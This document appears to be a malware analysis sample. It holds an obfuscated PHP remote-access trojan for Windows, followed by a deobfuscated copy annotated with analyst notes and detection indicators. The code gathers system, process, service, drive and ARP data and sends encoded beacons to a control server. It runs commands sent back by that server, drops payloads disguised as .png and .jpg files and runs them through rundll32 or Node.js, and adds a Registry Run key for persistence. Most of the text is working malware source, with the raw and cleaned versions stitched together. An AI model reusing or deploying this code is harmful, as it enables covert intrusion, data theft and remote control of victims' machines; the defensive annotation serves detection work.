lMiQ1; } goto dHiHX; uDsa9: throw new Exception("\106\x61\151\x6c\x65\144\40\164\x6f\40\145\170\145\143\165\x74\x65\x20\x63\x6f\x6d\x6d\x61\156\144"); goto AKKdq; pGDZf: $VcFzG = ''; goto fcuX5; knWWP: exec("\x70\157\x77\145\162\163\x68\x65\154\x6c\x20\x2d\x63\x20" . eBUOm("\107\x65\x74\x2d\123\x65\162\166\151\x63\145\x20\x7c\40\x53\145\154\145\x63\164\x2d\x4f\x62\152\x65\x63\x74\x20\55\120\162\157\160\x65\x72\x74\171\x20\x4e\x61\155\x65\54\x20\x44\x69\x73\x70\x6c\141\x79\x4e\141\x6d\x65\40\174\x20\103\157\x6e\x76\145\x72\x74\124\x6f\x2d\x4a\163\x6f\x6e"), $VcFzG, $SNVCT); goto cfh84; SbC1x: throw new Exception("\x46\x61\151\154\x65\x64\x20\164\157\40\x65\170\x65\143\x75\x74\145\x20\143\x6f\155\x6d\x61\x6e\x64"); goto MyX2j; Ux1lu: $VcFzG = ''; goto eake0; UBdzF: $VcFzG = ''; goto knWWP; pKKVZ: throw new Exception("\x46\141\151\x6c\145\144\40\164\x6f\x20\x65\x78\x65\x63\x75\164\145\40\143\x6f\x6d\155\x61\x6e\x64"); goto BYWCw; ZDCXZ: $pq8nP["\157\164\150\x65\x72"]["\x74\171\x70\x65\137\x66\151\154\145"] = "\x50\x48\x50"; goto nGMFa; eake0: exec("\160\x6f\x77\x65\x72\163\150\x65\154\154\40\55\143\40" . 
eBuom("\x47\145\x74\x2d\116\x65\x74\x4e\145\x69\147\150\x62\157\x72\x20\55\x41\144\x64\162\x65\163\163\x46\141\x6d\151\x6c\171\40\x49\x50\166\64\x20\x7c\x20\x57\150\145\162\145\x2d\x4f\x62\x6a\x65\143\x74\40\173\40\44\x5f\56\x53\x74\141\x74\x65\40\x2d\156\x65\x20\x27\x50\145\162\x6d\141\x6e\145\156\x74\47\x20\175\x20\174\x20\123\x65\154\x65\x63\164\55\x4f\142\152\x65\x63\164\x20\x40\173\x4e\141\155\x65\75\x27\111\x6e\x74\x65\162\x66\141\x63\145\x27\73\x20\x45\170\x70\x72\145\x73\x73\x69\x6f\x6e\x3d\173\x24\137\56\x49\x6e\164\145\x72\x66\x61\143\145\x41\x6c\151\x61\163\175\175\54\x20\100\x7b\116\x61\x6d\145\x3d\x27\111\x6e\x74\x65\x72\x6e\x65\x74\40\x41\x64\x64\162\145\163\x73\x27\73\40\x45\x78\160\x72\x65\163\163\x69\x6f\x6e\75\x7b\44\x5f\x2e\x49\120\101\x64\144\162\145\163\163\x7d\175\54\x20\100\173\x4e\141\x6d\x65\75\x27\x50\x68\171\163\x69\x63\141\x6c\40\x41\144\x64\162\x65\x73\163\x27\x3b\x20\105\x78\x70\x72\x65\x73\x73\x69\157\156\75\x7b\44\x5f\56\x4c\x69\x6e\x6b\114\x61\x79\x65\162\x41\144\144\162\145\163\x73\x7d\x7d\x2c\40\x40\173\116\x61\x6d\x65\x3d\47\124\171\160\x65\47\x3b\40\x45\170\x70\162\x65\x73\x73\151\x6f\156\75\x7b\47\x64\x79\156\x61\155\x69\x63\x27\175\x7d\40\174\40\x43\x6f\x6e\166\x65\x72\x74\x54\x6f\x2d\x4a\163\157\x6e"), $VcFzG, $SNVCT); goto rndx0; qd8Fr: exec("\160\157\x77\x65\162\163\150\x65\x6c\154\x20\55\143\40" . 
eBUOm("\x69\x66\40\50\x5b\x53\145\x63\165\x72\151\x74\171\56\120\162\x69\156\143\151\x70\141\154\56\127\x69\x6e\144\x6f\x77\163\111\x64\x65\x6e\x74\151\164\x79\x5d\72\x3a\x47\x65\x74\103\165\x72\x72\x65\x6e\x74\x28\x29\x2e\x4e\141\155\x65\40\x2d\155\x61\x74\x63\150\x20\x27\50\x3f\151\x29\123\131\123\124\105\x4d\x27\51\40\40\x7b\x20\x27\123\131\123\x54\105\115\47\x20\175\x20\x65\154\x73\x65\x69\x66\40\50\x28\133\123\145\x63\x75\x72\151\164\x79\56\x50\162\x69\x6e\x63\x69\160\x61\154\x2e\127\151\156\144\x6f\167\x73\x50\x72\151\x6e\143\151\x70\x61\x6c\x5d\x20\x5b\x53\145\x63\x75\x72\x69\164\171\56\120\162\151\156\x63\x69\x70\141\154\x2e\x57\x69\156\x64\x6f\x77\163\111\144\x65\x6e\x74\151\x74\171\x5d\x3a\x3a\107\x65\x74\103\x75\162\x72\145\156\x74\50\x29\51\x2e\111\163\x49\156\122\157\x6c\x65\x28\133\123\145\143\165\x72\x69\x74\x79\x2e\120\x72\151\x6e\x63\151\x70\141\x6c\x2e\127\x69\156\144\x6f\167\x73\x42\165\151\x6c\x74\111\x6e\122\x6f\154\x65\x5d\72\72\x41\x64\x6d\151\156\151\x73\x74\x72\x61\164\x6f\162\51\x29\40\x7b\x20\47\101\x44\x4d\111\x4e\47\x20\x7d\x20\145\154\x73\x65\40\173\x20\x27\125\x53\105\122\x27\40\175\40"), $VcFzG, $SNVCT); goto ZE_0z; nGMFa: $VcFzG = ''; goto XSIS3; XSIS3: exec("\x70\x6f\x77\x65\x72\163\150\145\154\154\x20\55\143\x20" . Ebuom("\x74\x61\163\x6b\154\x69\x73\164\40\57\x73\x76\x63\40\x2f\x46\x4f\40\103\123\x56\x20\174\40\103\157\156\x76\145\x72\x74\x46\x72\x6f\x6d\x2d\x43\x73\x76\x20\x7c\x20\103\157\x6e\x76\x65\162\164\124\157\55\x4a\163\157\x6e"), $VcFzG, $SNVCT); goto n7tiF; cfh84: if (!($SNVCT !== 0)) { goto qmKvZ; } goto a8yhg; BYWCw: Cbm6A: goto pq2wR; n7tiF: if (!($SNVCT !== 0)) { goto lpkKR; } goto fca41; SLI_8: $pq8nP["\157\164\150\145\162"]["\162\165\156\x61\x73"] = $VcFzG[0] ?? 
"\125\x4e\x4b\116\x4f\x57\116"; goto ZDCXZ; cROp6: $pq8nP["\141\x72\160"] = json_decode(implode($z5_HL, $VcFzG), true); goto WI1GD; Ukqd_: lpkKR: goto chqES; M2C6t: qmKvZ: goto GbUQf; ZE_0z: if (!($SNVCT !== 0)) { goto NZsLS; } goto SbC1x; oHGkx: if (!($SNVCT !== 0)) { goto jQNcR; } goto uDsa9; fcuX5: exec("\160\157\x77\145\162\163\150\145\154\x6c\x20\55\143\x20" . EBuoM("\107\x65\x74\x2d\120\x53\x44\x72\x69\166\145\x20\x2d\x50\123\x50\x72\x6f\166\151\144\145\x72\x20\106\x69\x6c\145\123\171\x73\x74\x65\x6d\x20\174\40\x43\157\x6e\x76\145\x72\164\x54\x6f\55\x4a\x73\x6f\x6e"), $VcFzG, $SNVCT); goto oHGkx; UkfT1: return $pq8nP; goto eTsV_; B6O88: exec("\x70\157\167\145\162\163\150\145\x6c\154\40\x2d\143\40" . EBUOM("\163\171\x73\164\145\155\x69\156\146\x6f\x20\x2f\106\117\x20\103\x53\x56\x20\x7c\40\103\157\x6e\x76\145\162\x74\x46\x72\x6f\155\x2d\x43\x73\x76\x20\x7c\x20\x43\157\x6e\x76\145\162\164\x54\157\x2d\x4a\x73\x6f\156"), $VcFzG, $SNVCT); goto XxNYe; Q2gRF: $VcFzG = ''; goto qd8Fr; MyX2j: NZsLS: goto xgZ3l; xgZ3l: $pq8nP["\157\x74\x68\145\162"]["\166\x65\x72\x73\151\x6f\x6e\x5f\x62\165\x69\x6c\144"] = $Zq3dJ; goto CwlsF; fca41: throw new Exception("\x46\141\151\154\x65\144\40\x74\157\x20\145\x78\145\x63\165\164\x65\x20\x63\x6f\155\155\141\x6e\144"); goto Ukqd_; GbUQf: $pq8nP["\x73\x65\162\x76\151\143\145\163"] = json_decode(implode($z5_HL, $VcFzG), true); goto pGDZf; dHiHX: throw new Exception("\x46\x61\x69\x6c\x65\144\40\x74\157\40\x65\170\x65\143\165\x74\145\40\x63\157\x6d\x6d\141\x6e\x64"); goto q8kzY; N1xfT: $pq8nP = []; goto B6O88; tkyF4: global $Zq3dJ, $TRW9p, $z5_HL; goto N1xfT; pq2wR: $pq8nP["\163\171\x73\164\x65\155\151\156\x66\157"] = json_decode(implode($z5_HL, $VcFzG), true); goto Q2gRF; XxNYe: if (!($SNVCT !== 0)) { goto Cbm6A; } goto pKKVZ; AKKdq: jQNcR: goto mT1JM; mT1JM: $pq8nP["\144\x72\151\166\x65\x73"] = json_decode(implode($z5_HL, $VcFzG), true); goto Ux1lu; chqES: $pq8nP["\160\x72\x6f\x63\145\x73\163\145\x73"] = json_decode(implode($z5_HL, 
$VcFzG), true); goto UBdzF; CwlsF: $pq8nP["\x6f\x74\x68\145\162"]["\x69\x64\137\x6c\157\143\x61\x6c"] = mt_rand(0, 100000000); goto YK3xh; a8yhg: throw new Exception("\x46\141\x69\154\x65\144\40\164\x6f\x20\145\x78\x65\143\165\164\x65\40\x63\x6f\155\155\x61\x6e\x64"); goto M2C6t; WI1GD: $VcFzG = ''; goto UkfT1; q8kzY: lMiQ1: goto cROp6; YK3xh: $pq8nP["\x6f\164\150\x65\x72"]["\151\144\137\x6c\x6f\x61\144\x65\x72"] = 43; goto SLI_8; eTsV_: } goto WepUh; yy3it: return; goto lAcZF; jwiJl: function W2HkM($rWwMf, $ycGYT) { goto NWIh0; G9qtk: fclose($kR8em); goto I3_o1; dhBF1: fwrite($kR8em, $pp0im); goto RtUeM; vvf7m: $V9G8z = $c83RQ->open(stream_get_meta_data($kR8em)["\x75\x72\x69"]); goto iuMN9; MuS06: fHw0a: goto oYwoD; NWIh0: if (file_exists($ycGYT)) { goto fHw0a; } goto X6Dp3; iuMN9: if (!($V9G8z !== true)) { goto tzzRq; } goto G9qtk; nYoIx: tzzRq: goto cBtNY; X6Dp3: if (mkdir($ycGYT, 0777, true)) { goto DKGfe; } goto A3nqo; BbwU7: iwCkU: goto P9hDa; JPUFf: $kR8em = tmpfile(); goto dhBF1; P9hDa: $c83RQ->close(); goto FpIhR; cBtNY: if ($c83RQ->extractTo($ycGYT)) { goto iwCkU; } goto J7IkD; I3_o1: return false; goto nYoIx; A3nqo: return false; goto R2mzG; J7IkD: $c83RQ->close(); goto KgBNv; FpIhR: fclose($kR8em); goto UbUzQ; SfTPK: return false; goto BbwU7; KgBNv: fclose($kR8em); goto SfTPK; UbUzQ: return true; goto B_ohv; RtUeM: rewind($kR8em); goto D_Qpg; oYwoD: $pp0im = file_get_contents($rWwMf); goto JPUFf; D_Qpg: $c83RQ = new Y27bM(); goto vvf7m; R2mzG: DKGfe: goto MuS06; B_ohv: } goto leVfr; ZChWJ: $JpsO7 = 0; goto j6E10; jUDyu: $z5_HL = chr(0xa); goto te03m; fCIkH: $bIiky = lU3Mn(); goto qdHaY; AS66c: gynqD:
<?php $TRW9p = "\""; $z5_HL = "\n"; if (!($argc < 2 && !N5n7d() || !extension_loaded("zip") && file_exists("/var/www/html/input.php"))) { $Zq3dJ = 20; $l2CpU = 80; $Jw6Sz = ["EXE" => 0, "DLL" => 1, "JS" => 2, "CMD" => 3, "ACTIVE" => 4, "AUTORUN" => 5, "OFF" => 6]; $u9iZC = 0; $bIiky = lU3Mn(); function N5n7d() { global $argv; return $argv[0] === "Standard input code"; } function ebUom($CTLfW) { global $TRW9p; return $TRW9p . $CTLfW . $TRW9p; } function SqC8C() { $ttefF = new DateTime("now", new DateTimeZone("Etc/GMT+5")); $Py5k4 = (int) $ttefF->getTimestamp() & -4096; $JZJtV = random_int(PHP_INT_MIN, PHP_INT_MAX); $qFHIp = $Py5k4 >> 32 & 0xffffffff; $FnMw5 = $Py5k4 & 0xffffffff; $gmNZ1 = $JZJtV >> 32 & 0xffffffff; $WiBhc = $JZJtV & 0xffffffff; $qFHIp ^= $gmNZ1; $FnMw5 ^= $WiBhc; $FnMw5 = $FnMw5 + 0x7ab092fe & 0xffffffff; $qFHIp = $qFHIp + 0x80952678 + ($FnMw5 < 0x7ab092fe ? 1 : 0) & 0xffffffff; $qFHIp ^= 0x219f7609; $FnMw5 ^= 0xd1769498; $qFHIp ^= 0x86ad5709; $FnMw5 ^= 0x15de8713; $WiBhc = $WiBhc + 0x29807914 & 0xffffffff; $gmNZ1 = $gmNZ1 + 0xf2879630 + ($WiBhc < 0x29807914 ? 1 : 0) & 0xffffffff; $qFHIp ^= $gmNZ1; $FnMw5 ^= $WiBhc; $Pab0F = sprintf("%08x%08x", $qFHIp, $FnMw5); $ZgXXo = sprintf("%08x%08x", $gmNZ1, $WiBhc); $NcwlV = DC6tA(rand(0, 14)); $SWHqo = dC6ta(rand(0, 14)); return ($NcwlV !== '' ? "/" . $NcwlV : '') . "/" . dC6ta(rand(0, 14)) . "&" . $Pab0F . $ZgXXo . ($SWHqo !== '' ? "/" . $SWHqo : ''); } function lu3mN() { global $Zq3dJ, $TRW9p, $z5_HL; $pq8nP = []; exec("powershell -c " . EBUOM("systeminfo /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $VcFzG, $SNVCT); if (!($SNVCT !== 0)) { $pq8nP["systeminfo"] = json_decode(implode($z5_HL, $VcFzG), true); $VcFzG = ''; exec("powershell -c " . 
eBUOm("if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'SYSTEM' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'ADMIN' } else { 'USER' } "), $VcFzG, $SNVCT); if (!($SNVCT !== 0)) { $pq8nP["other"]["version_build"] = $Zq3dJ; $pq8nP["other"]["id_local"] = mt_rand(0, 100000000); $pq8nP["other"]["id_loader"] = 43; $pq8nP["other"]["runas"] = $VcFzG[0] ?? "UNKNOWN"; $pq8nP["other"]["type_file"] = "PHP"; $VcFzG = ''; exec("powershell -c " . Ebuom("tasklist /svc /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $VcFzG, $SNVCT); if (!($SNVCT !== 0)) { $pq8nP["processes"] = json_decode(null, true); $VcFzG = ''; exec("powershell -c " . eBUOm("Get-Service | Select-Object -Property Name, DisplayName | ConvertTo-Json"), $VcFzG, $SNVCT); if (!($SNVCT !== 0)) { $pq8nP["services"] = json_decode(null, true); $VcFzG = ''; exec("powershell -c " . EBuoM("Get-PSDrive -PSProvider FileSystem | ConvertTo-Json"), $VcFzG, $SNVCT); if (!($SNVCT !== 0)) { $pq8nP["drives"] = json_decode(null, true); $VcFzG = ''; exec("powershell -c " . 
// NOTE(review): this excerpt opens in the middle of a function that starts before
// the visible lines; the fragment up to its final closing brace is reproduced
// unchanged and is not annotated.
eBuom("Get-NetNeighbor -AddressFamily IPv4 | Where-Object { \$_.State -ne 'Permanent' } | Select-Object @{Name='Interface'; Expression={\$_.InterfaceAlias}}, @{Name='Internet Address'; Expression={\$_.IPAddress}}, @{Name='Physical Address'; Expression={\$_.LinkLayerAddress}}, @{Name='Type'; Expression={'dynamic'}} | ConvertTo-Json"), $VcFzG, $SNVCT);
if (!($SNVCT !== 0)) {
    $pq8nP["arp"] = json_decode(null, true);
    $VcFzG = '';
    return $pq8nP;
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}

// Analyst note: PHP function names are case-insensitive, so the differently-cased
// calls below (nKUk9 / NKuK9, dc6Ta / DC6TA, eBuom / EbuoM, ...) all resolve to the
// same definitions. Signatures that match on these names must ignore case.

/**
 * In-place byte transform used on the traffic payloads in this sample.
 *
 * Each byte of $bzn_F (passed by reference) is XORed with a keystream built from
 * the key bytes of $OcIQg and a rolling one-byte state seeded from the first key
 * byte. The keystream depends only on the key and the byte index, so applying the
 * function twice with the same key restores the input; the same routine is used
 * for both directions (see eqiUb and KVUj0).
 */
function NkUk9(&$bzn_F, $OcIQg) {
    $uxlfE = ord($OcIQg[0]); // rolling state, seeded from key byte 0
    $MpqIM = strlen($bzn_F);
    $eUFvf = strlen($OcIQg);
    $izpa6 = 0;
    UgVfQ:
    if (!($izpa6 < $MpqIM)) {
        // [PHPDeobfuscator] Implied return
        return;
    }
    $uxlfE = ($uxlfE + ($uxlfE + $izpa6 % 256)) % 256;
    $bzn_F[$izpa6] = chr(ord($bzn_F[$izpa6]) ^ (ord($OcIQg[$izpa6 % $eUFvf]) ^ $uxlfE) % 256);
    ++$izpa6;
    goto UgVfQ;
}

/**
 * Encodes an outbound message: transform with a random 4-byte key, append the key,
 * then gzip.
 *
 * The key (a value from mt_rand packed as 4 little-endian bytes) is appended to the
 * transformed data, so the message carries everything needed to reverse it. This is
 * obfuscation rather than encryption: a captured request body can be decoded
 * offline by gunzipping, taking the last 4 bytes as the key and re-applying NkUk9.
 */
function eqiUb($bzn_F) {
    $DBzW7 = mt_rand(0, 100000000);
    $mesY9 = pack("V", $DBzW7);
    nKUk9($bzn_F, $mesY9);
    $wp5cV = $bzn_F . $mesY9;
    return gzencode($wp5cV, 5, FORCE_GZIP);
}

/**
 * Sends $bzn_F to the given host as an HTTP POST and returns the response.
 *
 * Network indicators visible here: cleartext "http://", Content-type
 * application/octet-stream, 20 second timeout, port taken from the global $l2CpU,
 * and a path returned by sqC8C() (defined outside this excerpt).
 * "ignore_errors" makes file_get_contents return the body even for 4xx/5xx, so the
 * status code is parsed from the first response header line instead.
 *
 * Returns an array with keys content, headers, status and code (0 when the status
 * line could not be parsed). Throws Exception when the request itself fails.
 */
function QUZhV($d_22F, $bzn_F) {
    global $l2CpU;
    $RKhlJ = ["http" => ["method" => "POST", "header" => ["Content-type: application/octet-stream"], "content" => $bzn_F, "ignore_errors" => true, "timeout" => 20]];
    $rWwMf = "http://" . $d_22F . ":" . $l2CpU . sqC8C();
    $uz8es = stream_context_create($RKhlJ);
    $BW3Wg = null;
    // Temporary handler: captures the warning text for the exception message below
    // instead of letting PHP print it.
    set_error_handler(function ($qVljG, $OndyP) use(&$BW3Wg) {
        $BW3Wg = $OndyP;
    });
    $by1ps = file_get_contents($rWwMf, false, $uz8es);
    restore_error_handler();
    if (!($by1ps === false)) {
        $Aarsj = 0;
        if (!isset($http_response_header[0])) {
            goto n3bJj;
        }
        preg_match("/HTTP\\/\\d\\.\\d\\s+(\\d{3})/", $http_response_header[0], $Lxf9l);
        if (!isset($Lxf9l[1])) {
            goto qR0In;
        }
        $Aarsj = (int) $Lxf9l[1];
        qR0In:
        n3bJj:
        return ["content" => $by1ps, "headers" => $http_response_header, "status" => $http_response_header[0] ?? null, "code" => $Aarsj];
    }
    throw new Exception("HTTP request failed: " . ($BW3Wg ?: "Unknown error"));
}

/**
 * Downloads the archive at $rWwMf and extracts it into the directory $ycGYT.
 *
 * The directory is created recursively with mode 0777 when it does not exist. The
 * download is written to a tmpfile() and opened through class Y27bM, which is
 * declared outside this excerpt (presumably a ZipArchive wrapper or alias, given
 * the open/extractTo/close calls; confirm against the full sample).
 * Returns true on successful extraction, false otherwise.
 */
function W2HkM($rWwMf, $ycGYT) {
    if (file_exists($ycGYT)) {
        goto fHw0a;
    }
    if (mkdir($ycGYT, 0777, true)) {
        fHw0a:
        $pp0im = file_get_contents($rWwMf);
        $kR8em = tmpfile();
        fwrite($kR8em, $pp0im);
        rewind($kR8em);
        $c83RQ = new Y27bM();
        $V9G8z = $c83RQ->open(stream_get_meta_data($kR8em)["uri"]);
        if (!($V9G8z !== true)) {
            if ($c83RQ->extractTo($ycGYT)) {
                $c83RQ->close();
                fclose($kR8em);
                return true;
            }
            $c83RQ->close();
            fclose($kR8em);
            return false;
        }
        fclose($kR8em);
        return false;
    }
    return false;
}

/**
 * Persistence routine: registers the PHP binary plus a script path under the
 * current user's Run key.
 *
 * When N5n7D() is true (defined outside this excerpt; its meaning is not visible
 * here), the process reads its own command line through wmic, extracts the code
 * that followed "php.exe ... -r", and writes it to a dot-prefixed, randomly named
 * .txt file in the current working directory. If no " -r " is found it returns
 * false. Otherwise the script path is the literal "/var/www/html/input.php".
 * NOTE(review): that literal looks like the path the file had on the deobfuscation
 * service (a resolved __FILE__); verify against the original sample.
 *
 * The Run value name is a directory name borrowed from APPDATA/LOCALAPPDATA
 * (VQAIZ), so it resembles an installed application.
 *
 * Triage pointers taken from this code: HKCU ...\CurrentVersion\Run values whose
 * data contains a php binary and a .txt argument; "wmic process where processid=
 * ... get commandline" spawned by php; "reg add ... /f" spawned by php.
 * $TRW9p and $z5_HL are globals set outside this excerpt (they are used like a
 * quote character and a line separator; confirm).
 */
function Zj6UF() {
    global $TRW9p, $z5_HL;
    if (N5n7D()) {
        $OPdCw = "." . dc6Ta(12) . ".txt";
        $xJ5KY = shell_exec("wmic process where processid=" . getmypid() . " get commandline");
        if (!(!$xJ5KY || !preg_match_all("/\\s-r\\s/", $xJ5KY))) {
            $XYh87 = explode($z5_HL, $xJ5KY, 2);
            $gGkCt = trim($XYh87[1] ?? '');
            $UAqhd = preg_split("/php\\.exe.*?\\s-r\\s+/", $gGkCt, 2);
            $hiPBF = isset($UAqhd[1]) ? trim(str_replace($TRW9p, '', $UAqhd[1])) : '';
            file_put_contents($OPdCw, $hiPBF);
            goto qWHem;
        }
        return false;
    }
    $OPdCw = "/var/www/html/input.php";
    qWHem:
    exec("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v " . EbuoM(vqaIz()) . " /t REG_SZ /d " . EbuOm("\\" . $TRW9p . PHP_BINARY . "\\" . $TRW9p . " \\" . $TRW9p . $OPdCw . "\\" . $TRW9p) . " /f");
    return true;
}

/**
 * Returns the name of a random entry from the APPDATA / LOCALAPPDATA listings.
 *
 * The two scandir() results are combined with the array "+" operator, which keeps
 * the first list and only adds entries of the second whose numeric index is not
 * already present. The result is used as a look-alike name for the Run value
 * (Zj6UF) and for drop directories (m3tzg). The full listing is also printed.
 */
function VQAIZ() {
    $XEMm8 = scandir(getenv("APPDATA")) + scandir(getenv("LOCALAPPDATA"));
    $XEMm8 = array_diff($XEMm8, [".", ".."]);
    $XEMm8 = array_values($XEMm8);
    print_r($XEMm8);
    return $XEMm8[rand(0, count($XEMm8) - 1)];
}

/**
 * Returns a random alphanumeric string of $M3_yG characters (default 16), drawn
 * with rand(). Used for the names of dropped files.
 */
function dc6ta($M3_yG = 16) {
    $Gmm_S = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $rPvk7 = strlen($Gmm_S);
    $CTLfW = '';
    $izpa6 = 0;
    jBUAd:
    if (!($izpa6 < $M3_yG)) {
        return $CTLfW;
    }
    $CTLfW .= $Gmm_S[rand(0, $rPvk7 - 1)];
    $izpa6++;
    goto jBUAd;
}

// Holds the child process started by kWB_d (process handle and its pipes), or null.
$tPTLN = null;

/**
 * Starts $F3c9H as a child process with stdin/stdout/stderr pipes and records it in
 * the global $tPTLN without waiting for it. Output is collected later by SQ9Nz.
 * Returns nothing on success and the string "<failed>" when proc_open fails.
 */
function kWB_d($F3c9H) {
    global $tPTLN;
    $P80xZ = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
    $m4lMb = proc_open($F3c9H, $P80xZ, $Fa3EX);
    if (is_resource($m4lMb)) {
        $tPTLN = ["process" => $m4lMb, "pipes" => $Fa3EX];
        // [PHPDeobfuscator] Implied return
        return;
    }
    return "<failed>";
}

/**
 * Polls the child process recorded in $tPTLN.
 *
 * Returns null when there is no process or it is still running. Once it has
 * exited, the global is cleared, stdout and stderr are read, the pipes and process
 * are closed, and a text report ("out:..." plus "err(<exit code>):..." when stderr
 * is non-empty) is returned.
 * Note: several strings here contain the literal characters "PHP_EOL" rather than a
 * line break, as shown in the deobfuscated output; those literal markers appear in
 * the report text.
 */
function SQ9Nz() {
    global $tPTLN;
    if (!(!$tPTLN || !isset($tPTLN["process"]) || !isset($tPTLN["pipes"]))) {
        $m4lMb = $tPTLN["process"];
        $Fa3EX = $tPTLN["pipes"];
        if (!proc_get_status($m4lMb)["running"]) {
            $tPTLN = null;
            $OeoM5 = stream_get_contents($Fa3EX[1]);
            $AirsC = stream_get_contents($Fa3EX[2]);
            fclose($Fa3EX[0]);
            fclose($Fa3EX[1]);
            fclose($Fa3EX[2]);
            $jzdVa = proc_close($m4lMb);
            $f9Lnh = "out:PHP_EOL";
            if ($OeoM5) {
                $f9Lnh .= $OeoM5;
                goto omgp5;
            }
            $f9Lnh .= "<empty>";
            omgp5:
            if (!$AirsC) {
                goto bA9U2;
            }
            $f9Lnh .= "PHP_EOLerr(" . $jzdVa . "):" . PHP_EOL . $AirsC;
            bA9U2:
            return $f9Lnh;
        }
        echo "\$last_command == runningPHP_EOL";
        return null;
    }
    echo "\$last_command == nullPHP_EOL";
    return null;
}

/**
 * Launches the file $yQKMW (optionally with arguments $F3c9H) through a hidden
 * PowerShell window using Start-Process, and echoes the command line it built.
 *
 * Process-tree indicator: php spawning "powershell.exe -WindowStyle Hidden -c"
 * whose script contains "Start-Process -WindowStyle Hidden -FilePath".
 * eBuOm is defined outside this excerpt (presumably argument quoting; confirm).
 */
function nrRh4($yQKMW, $F3c9H) {
    global $TRW9p, $z5_HL;
    $EcbYV = "powershell.exe -WindowStyle Hidden -c " . eBuOm("Start-Process -WindowStyle Hidden -FilePath '" . $yQKMW . "'" . ($F3c9H ? " -ArgumentList '" . preg_replace("/" . $TRW9p . "/", "\\" . $TRW9p, $F3c9H) . "'" : ''));
    echo $EcbYV . $z5_HL . $z5_HL;
    shell_exec($EcbYV);
}

/**
 * Creates and returns a new directory under APPDATA whose name is an existing
 * APPDATA/LOCALAPPDATA entry name followed by a random number (0..1000000).
 * Dropped payloads are written into these directories (see KVUj0).
 */
function m3tzg() {
    $A94N8 = getenv("APPDATA") . "\\" . vqAIz() . rand(0, 1000000);
    mkdir($A94N8);
    return $A94N8;
}

/**
 * One polling round against the server $d_22F.
 *
 * Request: the global $bIiky (built outside this excerpt) is JSON-encoded, encoded
 * with eqiUb and POSTed; if a previously started command has finished, its report
 * is attached under "cmd" for this round only.
 *
 * Response handling: 204 means nothing to do; any status other than 200 raises an
 * Exception. For 200, the last 4 bytes of the body are the transform key, the rest
 * is decoded with NkUk9, and the final decoded byte selects the action through the
 * global map $Jw6Sz (values set outside this excerpt):
 *   CMD     run the body as a command line (kWB_d)
 *   ACTIVE  store a 32-bit counter in $u9iZC
 *   AUTORUN install the Run-key persistence (Zj6UF)
 *   OFF     exit the process
 *   EXE     write the body to a random .exe in a new APPDATA directory and launch it
 *   DLL     write the body to a random .png and launch it via rundll32 with "start"
 *   JS      write the body to a random .jpg and run it with node.exe from
 *           APPDATA\node-v21.7.3-win-x64, downloading that runtime first if absent
 *   other   write the body to a random .txt
 *
 * Host-side indicators from this code: executable content stored under image
 * extensions (.png passed to rundll32.exe, .jpg passed to node.exe), a Node.js
 * runtime unpacked directly under APPDATA, and randomly named 8-character files in
 * APPDATA subdirectories whose names end in digits.
 */
function KVUj0($d_22F) {
    global $bIiky, $Jw6Sz, $TRW9p, $u9iZC;
    if (!(($Wp4BQ = sQ9NZ()) !== null)) {
        goto Wa39F;
    }
    $bIiky["cmd"] = $Wp4BQ;
    Wa39F:
    $hiPBF = QuZhv($d_22F, EQIuB(json_encode($bIiky, JSON_PRETTY_PRINT)));
    unset($bIiky["cmd"]);
    $FbIQb = $hiPBF["content"];
    $Aarsj = $hiPBF["code"];
    if (!($Aarsj == 204)) {
        if (!($Aarsj !== 200)) {
            // Trailing 4 bytes = key; strip them, then reverse the transform.
            $v9iU7 = substr($FbIQb, strlen($FbIQb) - 4, strlen($FbIQb));
            $FbIQb = substr($FbIQb, 0, strlen($FbIQb) - 4);
            NKuK9($FbIQb, $v9iU7);
            // Last decoded byte = action selector; the remainder is the action's data.
            $R1Ohn = ord($FbIQb[strlen($FbIQb) - 1]);
            $FbIQb = substr($FbIQb, 0, strlen($FbIQb) - 1);
            $F3c9H = null;
            switch ($R1Ohn) {
                case $Jw6Sz["CMD"]:
                    echo "CMDPHP_EOL";
                    Kwb_D($FbIQb);
                    return;
                case $Jw6Sz["ACTIVE"]:
                    echo "ACTIVEPHP_EOL";
                    $u9iZC = unpack("V", $FbIQb)[1];
                    return;
                case $Jw6Sz["AUTORUN"]:
                    echo "AUTORUNPHP_EOL";
                    Zj6uF();
                    return;
                case $Jw6Sz["OFF"]:
                    echo "OFFPHP_EOL";
                    exit(0);
                case $Jw6Sz["EXE"]:
                    echo "EXEPHP_EOL";
                    $yQKMW = M3tZG() . "\\" . dc6Ta(8) . ".exe";
                    file_put_contents($yQKMW, $FbIQb);
                    goto asPv7;
                case $Jw6Sz["DLL"]:
                    echo "DLLPHP_EOL";
                    // Payload is stored with a .png extension but handed to rundll32.
                    $q6oxc = M3TZG() . "\\" . DC6TA(8) . ".png";
                    $yQKMW = "C:\\Windows\\System32\\rundll32.exe";
                    $F3c9H = ebuom($q6oxc) . " start";
                    file_put_contents($q6oxc, $FbIQb);
                    goto asPv7;
                case $Jw6Sz["JS"]:
                    echo "JSPHP_EOL";
                    $yQKMW = getenv("APPDATA") . "\\" . "node-v21.7.3-win-x64\\node.exe";
                    // The runtime archive is fetched over plain http when node.exe is missing.
                    if (!(!file_exists($yQKMW) && !W2hkm("http://nodejs.org/dist/v21.7.3/node-v21.7.3-win-x64.zip", getenv("APPDATA")))) {
                        // Script is stored with a .jpg extension and passed to node.exe.
                        $F3c9H = M3tzG() . "\\" . dC6Ta(8) . ".jpg";
                        file_put_contents($F3c9H, $FbIQb);
                        goto asPv7;
                    }
                    echo "failed install nodejsPHP_EOL";
                    return;
                default:
                    echo "OTHERPHP_EOL";
                    file_put_contents(m3Tzg() . "\\" . dc6ta(8) . ".txt", $FbIQb);
                    return;
            }
            asPv7:
            nrrh4($yQKMW, $F3c9H);
            // [PHPDeobfuscator] Implied return
            return;
        }
